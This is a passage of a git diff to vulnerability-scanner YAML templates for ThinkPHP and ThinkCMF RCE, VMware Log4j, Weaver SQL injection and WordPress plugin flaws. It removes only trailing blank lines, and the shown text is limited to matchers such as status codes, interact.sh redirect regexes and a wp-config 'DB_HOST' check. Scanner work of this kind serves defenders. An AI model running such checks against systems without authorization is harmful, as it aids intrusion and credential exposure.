85d34ee75f..b82fa59f6b 100644 --- a/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml +++ b/http/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -25,5 +25,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index 7dea0822ee..ff33572217 100644 --- a/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/http/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml index b461b8558c..0e3e42dbcd 100644 --- a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml +++ b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml @@ -33,5 +33,3 @@ http: - 'contains(body_2, "PHP Version")' - 'status_code_2 == 200' condition: and - - diff --git a/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml index bfc60456af..d1f7d27db3 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -27,5 +27,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml index 890a66b1dd..ab045560ba 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml index a378f03cf7..204d653d36 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -27,5 +27,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml index 0adfe7626f..69d8b00b72 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index 95319006dc..beb1e999c2 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -27,5 +27,3 @@ http: - type: status status: - 500 - - diff --git a/http/vulnerabilities/tongda/tongda-path-traversal.yaml b/http/vulnerabilities/tongda/tongda-path-traversal.yaml index 4311821fd9..f26d730475 100644 --- a/http/vulnerabilities/tongda/tongda-path-traversal.yaml +++ b/http/vulnerabilities/tongda/tongda-path-traversal.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/videoxpert-lfi.yaml b/http/vulnerabilities/videoxpert-lfi.yaml index 7d9283ea66..59a0aacc46 100644 --- a/http/vulnerabilities/videoxpert-lfi.yaml +++ b/http/vulnerabilities/videoxpert-lfi.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index d0cc66a883..39f743c4b3 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml @@ -68,5 +68,3 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - - diff --git a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml index 64aeafbc4a..8543d51744 100644 --- a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -47,5 +47,3 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - - diff --git a/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index 45207566a6..c2607a2b01 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml index c311249368..b1a09dcb3d 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -47,5 +47,3 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - - diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index a042362cd4..290f429045 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -66,5 +66,3 @@ http: group: 1 regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - - diff --git a/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml index 46ddc6b8b8..f1b681c088 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml @@ -42,5 +42,3 @@ http: - "status_code_1 == 200" - "contains(body_2, '319463310816') || status_code_2 == 200" condition: and - - diff --git a/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml b/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml index 2e14cba8b6..3d32566c72 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml @@ -27,5 +27,3 @@ http: words: - "/weaver/" part: body - - diff --git a/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml b/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml index 0a1c9c340d..753a481170 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml @@ -26,5 +26,3 @@ http: words: - "/weaver/" part: body - - diff --git a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml index d404ae2f13..35f05d678b 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml b/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml index a768521579..6563496f15 100644 --- a/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml +++ b/http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml b/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml index f5149a32fd..e76c32a284 100644 --- a/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml +++ b/http/vulnerabilities/weaver/oa-v9-uploads-file.yaml @@ -41,5 +41,3 @@ http: - 'contains(body_2, "2be8e556fee1a876f10fa086979b8c7c")' - 'status_code_2 == 200' condition: and - - diff --git a/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml b/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml index 003b61d307..05c440550a 100644 --- a/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml +++ b/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml index b0258ac015..335272982c 100644 --- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml @@ -50,5 +50,3 @@ http: - "status_code_2 == 200" - "contains(body_2, '3DPrint-arbitrary-file-upload')" condition: and - - diff --git a/http/vulnerabilities/wordpress/404-to-301-xss.yaml b/http/vulnerabilities/wordpress/404-to-301-xss.yaml index 9c02165773..c119760f90 100644 --- a/http/vulnerabilities/wordpress/404-to-301-xss.yaml +++ b/http/vulnerabilities/wordpress/404-to-301-xss.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/ad-widget-lfi.yaml b/http/vulnerabilities/wordpress/ad-widget-lfi.yaml index 768ce2a9bb..eeffba6742 100644 --- a/http/vulnerabilities/wordpress/ad-widget-lfi.yaml +++ b/http/vulnerabilities/wordpress/ad-widget-lfi.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml index c3a28b1af1..dfef36e536 100644 --- a/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml +++ b/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml index 5d976d961a..f79e3f9f8b 100644 --- a/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -32,5 +32,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/vulnerabilities/wordpress/age-gate-xss.yaml b/http/vulnerabilities/wordpress/age-gate-xss.yaml index 0b57177f44..26a7a1c43c 100644 --- a/http/vulnerabilities/wordpress/age-gate-xss.yaml +++ b/http/vulnerabilities/wordpress/age-gate-xss.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml index dd54d0a583..b0b7668940 100644 --- a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml +++ b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml index 5a50c1fd7a..23260049e4 100644 --- a/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml +++ b/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml index a88329ba1f..fa3709a408 100644 --- a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml +++ b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 404 - - diff --git a/http/vulnerabilities/wordpress/aspose-file-download.yaml b/http/vulnerabilities/wordpress/aspose-file-download.yaml index 128227e826..1844b6ad79 100644 --- a/http/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-file-download.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml index 5a52b86ee5..ebc2168b91 100644 --- a/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 5ad03454b5..f7dc70394f 100644 --- a/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/aspose-words-file-download.yaml b/http/vulnerabilities/wordpress/aspose-words-file-download.yaml index 1ea0826696..f1dc7ba3c8 100644 --- a/http/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index 3e18dbd7df..5c2cdf900c 100644 --- a/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -25,5 +25,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml index 6638fe0070..9778469b8a 100644 --- a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml +++ b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/brandfolder-lfi.yaml b/http/vulnerabilities/wordpress/brandfolder-lfi.yaml index a303c427f4..372c40946e 100644 --- a/http/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/http/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index e052fe146f..ea0ba2d3ad 100644 --- a/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -23,5 +23,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - - diff --git a/http/vulnerabilities/wordpress/calameo-publications-xss.yaml b/http/vulnerabilities/wordpress/calameo-publications-xss.yaml index ddb250c964..e8482f84dc 100644 --- a/http/vulnerabilities/wordpress/calameo-publications-xss.yaml +++ b/http/vulnerabilities/wordpress/calameo-publications-xss.yaml @@ -39,5 +39,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml index 1de1e3cf53..44871a1f47 100644 --- a/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml +++ b/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/cherry-file-download.yaml b/http/vulnerabilities/wordpress/cherry-file-download.yaml index f729c33551..3ebe7ca0d6 100644 --- a/http/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/http/vulnerabilities/wordpress/cherry-file-download.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/cherry-lfi.yaml b/http/vulnerabilities/wordpress/cherry-lfi.yaml index 18ab3ae0d7..05213085ee 100644 --- a/http/vulnerabilities/wordpress/cherry-lfi.yaml +++ b/http/vulnerabilities/wordpress/cherry-lfi.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/church-admin-lfi.yaml b/http/vulnerabilities/wordpress/church-admin-lfi.yaml index 4dc78dccaf..341a3dc711 100644 --- a/http/vulnerabilities/wordpress/church-admin-lfi.yaml +++ b/http/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/churchope-lfi.yaml b/http/vulnerabilities/wordpress/churchope-lfi.yaml index 3ee6e801f1..aaaae582a7 100644 --- a/http/vulnerabilities/wordpress/churchope-lfi.yaml +++ b/http/vulnerabilities/wordpress/churchope-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml index 92ca2ff1ac..a93c8ff797 100644 --- a/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml +++ b/http/vulnerabilities/wordpress/clearfy-cache-xss.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/curcy-xss.yaml b/http/vulnerabilities/wordpress/curcy-xss.yaml index 20b64a52c3..4b9a7687c6 100644 --- a/http/vulnerabilities/wordpress/curcy-xss.yaml +++ b/http/vulnerabilities/wordpress/curcy-xss.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml index 38688a8c68..a6d6523572 100644 --- a/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/http/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index 5ca06ccab2..433da6e27f 100644 --- a/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -26,5 +26,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - - diff --git a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml index 2f5d9d05e2..e0793969af 100644 --- a/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml +++ b/http/vulnerabilities/wordpress/elex-woocommerce-xss.yaml @@ -46,5 +46,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index e99ba85dd0..cb2497ee93 100644 --- a/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/http/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/hb-audio-lfi.yaml b/http/vulnerabilities/wordpress/hb-audio-lfi.yaml index 62f1d4824b..3f1ea5fef0 100644 --- a/http/vulnerabilities/wordpress/hb-audio-lfi.yaml +++ b/http/vulnerabilities/wordpress/hb-audio-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/health-check-lfi.yaml b/http/vulnerabilities/wordpress/health-check-lfi.yaml index db74a42d5d..8205edc084 100644 --- a/http/vulnerabilities/wordpress/health-check-lfi.yaml +++ b/http/vulnerabilities/wordpress/health-check-lfi.yaml @@ -49,5 +49,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml b/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml index 1a6c7c097d..688c2dde65 100644 --- a/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml +++ b/http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml index 22f4c8085f..c78c2d8544 100644 --- a/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/http/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/members-list-xss.yaml b/http/vulnerabilities/wordpress/members-list-xss.yaml index 3e6d6ca203..29ddfcc9f2 100644 --- a/http/vulnerabilities/wordpress/members-list-xss.yaml +++ b/http/vulnerabilities/wordpress/members-list-xss.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml index 96e9885b6d..6a12bb3355 100644 --- a/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml index 99540cbe55..f4e0063010 100644 --- a/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml +++ b/http/vulnerabilities/wordpress/mthemeunus-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/music-store-open-redirect.yaml b/http/vulnerabilities/wordpress/music-store-open-redirect.yaml index a1af8cc92d..721bfd9ce5 100644 --- a/http/vulnerabilities/wordpress/music-store-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/music-store-open-redirect.yaml @@ -28,5 +28,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml index 1d43a0c80a..7bc79c1598 100644 --- a/http/vulnerabilities/wordpress/my-chatbot-xss.yaml +++ b/http/vulnerabilities/wordpress/my-chatbot-xss.yaml @@ -45,5 +45,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index f553f72190..b2a2908b2a 100644 --- a/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/http/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml @@ -28,5 +28,3 @@ http: - "DB_HOST" - "The base configurations of the WordPress" condition: and - - diff --git a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml index 1f3e6a0420..0194b7672b 100644 --- a/http/vulnerabilities/wordpress/new-user-approve-xss.yaml +++ b/http/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml index 28580e517c..668bd702d1 100644 --- a/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -24,5 +24,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml index 7e2f572ffa..9e427bed05 100644 --- a/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/pieregister-open-redirect.yaml @@ -24,5 +24,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - - diff --git a/http/vulnerabilities/wordpress/sassy-social-share.yaml b/http/vulnerabilities/wordpress/sassy-social-share.yaml index 9567af61d4..e266110afc 100644 --- a/http/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/http/vulnerabilities/wordpress/sassy-social-share.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml index a29ca90515..a010f5b3aa 100644 --- a/http/vulnerabilities/wordpress/seo-redirection-xss.yaml +++ b/http/vulnerabilities/wordpress/seo-redirection-xss.yaml @@ -58,5 +58,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/shortcode-lfi.yaml b/http/vulnerabilities/wordpress/shortcode-lfi.yaml index 366b161abf..01ce27ff67 100644 --- a/http/vulnerabilities/wordpress/shortcode-lfi.yaml +++ b/http/vulnerabilities/wordpress/shortcode-lfi.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml index 2d70ca1cbe..e762f1d9cc 100644 --- a/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml +++ b/http/vulnerabilities/wordpress/shortpixel-image-optimizer-xss.yaml @@ -47,5 +47,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml b/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 3c32330c34..d9201c0011 100644 --- a/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -26,5 +26,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml b/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml index 5b635eed7d..36b6a017b6 100644 --- a/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml @@ -25,5 +25,3 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header - - diff --git a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml index b3dc76590c..8d632e03f7 100644 --- a/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml +++ b/http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml @@ -49,5 +49,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 01d0668ef3..4a4c5a70a6 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -51,5 +51,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml b/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml index f3cdc2ce57..e80166e4d8 100644 --- a/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml +++ b/http/vulnerabilities/wordpress/wordpress-woocommerce-listing.yaml @@ -26,5 +26,3 @@ http: - type: status status: - 200 - - diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index e848120781..e37f13595c 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff 